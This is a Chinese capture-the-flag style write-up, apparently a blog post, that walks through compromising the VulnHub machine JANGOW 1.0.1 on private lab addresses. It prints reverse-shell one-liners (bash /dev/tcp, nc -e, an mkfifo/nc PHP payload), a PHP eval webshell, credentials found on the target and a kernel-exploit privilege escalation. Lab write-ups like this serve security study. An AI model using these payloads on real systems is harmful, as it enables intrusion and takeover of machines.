1-vulnhub靶场,JANGOW: 1.0.1

靶机地址:192.168.56.73
攻击机地址:192.168.56.129

namp搜集信息:
在这里插入图片描述
获取信息:21,80端口开放,linux系统。
访问80端口:
在这里插入图片描述
在这里插入图片描述
右上角的选项发现参数传递,最后发现存在命令执行漏洞。
在这里插入图片描述
尝试反弹shell:
攻击机192.168.56.129进行监听

nc -lvp 2345

命令执行漏洞执行任意一条:
bash反弹:

bash -i >/dev/tcp/192.168.56.129/2345 0>&1 2>&1

NC反弹:

nc -e /bin/bash 192.168.56.129 2345

在这里插入图片描述
发现反弹失败
尝试写入后门:

echo '<?php @eval($_POST['x']); ?>' >> webshell.php

写入成功:
在这里插入图片描述
用蚁剑连接:
在这里插入图片描述
在俩目录下发现俩个账号密码:
在这里插入图片描述
在这里插入图片描述
账号/密码:desafio02/abygurl69,jangow01/abygurl69
尝试用俩账号连接ftp
jangow01显示连接成功
在这里插入图片描述
在site目录下新建反弹shell文件:

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.129 3345 >/tmp/f");?>

在这里插入图片描述
Kali进行监听并访问该文件,成功反弹shell
在这里插入图片描述
这里只可以利用443端口进行反弹。
切换交互式bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
Su 切换用户
俩个尝试后只有01可以进去的
查看sudo命令
Sudo -l
在这里插入图片描述
查看系统内核
uname -a
在这里插入图片描述
查找是否存在漏洞:

searchsploit Ubantu 4.4.0-31

在这里插入图片描述
存在可利用漏洞,下载其中可利用exp
在这里插入图片描述
先编译好然后使用python搭建临时http服务器传过去

gcc 45010.c -o exp
python3 -m http.server 8000

在这里插入图片描述
然后靶机下载该exp

wget http://192.168.56.129:8000/exp 

在这里插入图片描述
下载不了
利用ftp传过去:
在这里插入图片描述
上传成功之后来到反弹shell成功的01账户
在这里插入图片描述
先找到exp位置
cd /home/jangow01
给exp给予执行的权限并执行
Chmod +x exp
./exp执行
在这里插入图片描述
完成。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值